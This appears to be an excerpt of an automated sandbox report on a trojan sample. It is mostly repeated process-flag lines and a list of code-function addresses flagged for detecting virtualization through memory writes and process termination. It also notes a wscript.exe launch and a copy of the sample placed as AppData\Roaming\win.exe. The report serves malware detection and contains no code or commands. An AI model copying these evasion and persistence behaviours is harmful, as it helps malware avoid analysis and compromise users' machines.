            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3244
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3275
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2FA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C6D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3063
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B30C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8CDA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3114
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B317B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8DC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8DFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B31F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8D14
